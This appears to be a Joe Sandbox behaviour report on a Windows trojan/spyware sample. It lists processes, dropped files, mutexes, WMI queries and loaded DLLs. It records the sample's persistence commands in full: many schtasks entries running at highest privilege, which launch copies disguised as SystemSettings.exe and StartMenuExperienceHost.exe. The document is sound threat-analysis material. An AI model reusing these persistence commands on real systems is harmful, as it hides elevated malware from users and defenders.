Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F30D4C 37_2_00007FF848F30D4C
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F30E43 37_2_00007FF848F30E43
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F616E1 37_2_00007FF848F616E1
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F6D42A 37_2_00007FF848F6D42A
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F40EF0 37_2_00007FF848F40EF0
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F404FA 37_2_00007FF848F404FA
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F403FA 37_2_00007FF848F403FA
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F40000 37_2_00007FF848F40000
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F400D3 37_2_00007FF848F400D3
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F30EF0 38_2_00007FF848F30EF0
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F304FA 38_2_00007FF848F304FA
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F303FA 38_2_00007FF848F303FA
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F30000 38_2_00007FF848F30000
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F300D3 38_2_00007FF848F300D3
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F516E1 38_2_00007FF848F516E1
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F5D42A 38_2_00007FF848F5D42A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F20D4C 38_2_00007FF848F20D4C
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 38_2_00007FF848F20E43 38_2_00007FF848F20E43
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F20CA6 40_2_00007FF848F20CA6
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F204FA 40_2_00007FF848F204FA
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F203FA 40_2_00007FF848F203FA
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F20000 40_2_00007FF848F20000
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F200D3 40_2_00007FF848F200D3
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F10D4C 40_2_00007FF848F10D4C
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F10E43 40_2_00007FF848F10E43
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F416E1 40_2_00007FF848F416E1
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Code function: 40_2_00007FF848F4D42A 40_2_00007FF848F4D42A
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F4D42A 41_2_00007FF848F4D42A
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F416E1 41_2_00007FF848F416E1
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F10D4C 41_2_00007FF848F10D4C
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F10E43 41_2_00007FF848F10E43
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F20EF0 41_2_00007FF848F20EF0
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F203FA 41_2_00007FF848F203FA
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F204FA 41_2_00007FF848F204FA
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F20000 41_2_00007FF848F20000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF848F200D3 41_2_00007FF848F200D3
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF8492D195F 41_2_00007FF8492D195F
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF84968AD5F 41_2_00007FF84968AD5F
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 41_2_00007FF8497B6515 41_2_00007FF8497B6515
Source: C:\Users\Default\SystemSettings.exe Code function: 43_2_00007FF848F00D4C 43_2_00007FF848F00D4C
Source: C:\Users\Default\SystemSettings.exe Code function: 43_2_00007FF848F00E43 43_2_00007FF848F00E43
Source: Joe Sandbox View Dropped File: C:\Recovery\apERZQztEJsqymITPFxguVe.exe C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
Source: Joe Sandbox View Dropped File: C:\Users\Default\SystemSettings.exe C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\BQDZBqHE.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
Source: lv961v43L3.exe, 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000000.00000002.2107383258.000000001C347000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000020.00000002.2196680523.00000000034DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000021.00000002.2220747873.0000000003326000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000021.00000002.2220747873.00000000032B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000026.00000002.2221206015.00000000029A6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe, 00000026.00000002.2221206015.0000000002931000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs lv961v43L3.exe
Source: lv961v43L3.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs Cryptographic APIs: 'CreateDecryptor'
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs Cryptographic APIs: 'CreateDecryptor'
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs Cryptographic APIs: 'CreateDecryptor'
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/86@1/1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\Desktop\ExWQYAoA.log Jump to behavior
Source: C:\Users\Default\SystemSettings.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-DDVr7jAKL4sPNJFYbkfE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Users\user\AppData\Local\Temp\2e3777aa9f8e813616590df35047cd9710d88b08 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat"
Source: lv961v43L3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lv961v43L3.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\lv961v43L3.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\lv961v43L3.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: StartMenuExperienceHost.exe, 00000029.00000002.3361714780.000000001CEE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera');
Source: hzSiynbOWa.41.dr, TNlmI3foeW.41.dr, jmWZu0Jun8.41.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: lv961v43L3.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\lv961v43L3.exe File read: C:\Users\user\Desktop\lv961v43L3.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 7 /tr "'C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP"
Source: unknown Process created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP"
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Recovery\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 6 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVe" /sc ONLOGON /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "apERZQztEJsqymITPFxguVea" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\SystemSettings.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 11 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3" /sc ONLOGON /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lv961v43L3l" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\lv961v43L3.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\Users\user\Desktop\lv961v43L3.exe C:\Users\user\Desktop\lv961v43L3.exe
Source: unknown Process created: C:\Users\user\Desktop\lv961v43L3.exe C:\Users\user\Desktop\lv961v43L3.exe
Source: unknown Process created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
Source: unknown Process created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
Source: unknown Process created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
Source: unknown Process created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
Source: unknown Process created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
Source: unknown Process created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
Source: unknown Process created: C:\Users\Default\SystemSettings.exe "C:\Users\Default User\SystemSettings.exe"
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71E1.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73C6.tmp" "c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\lv961v43L3.exe "C:\Users\user\Desktop\lv961v43L3.exe"
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
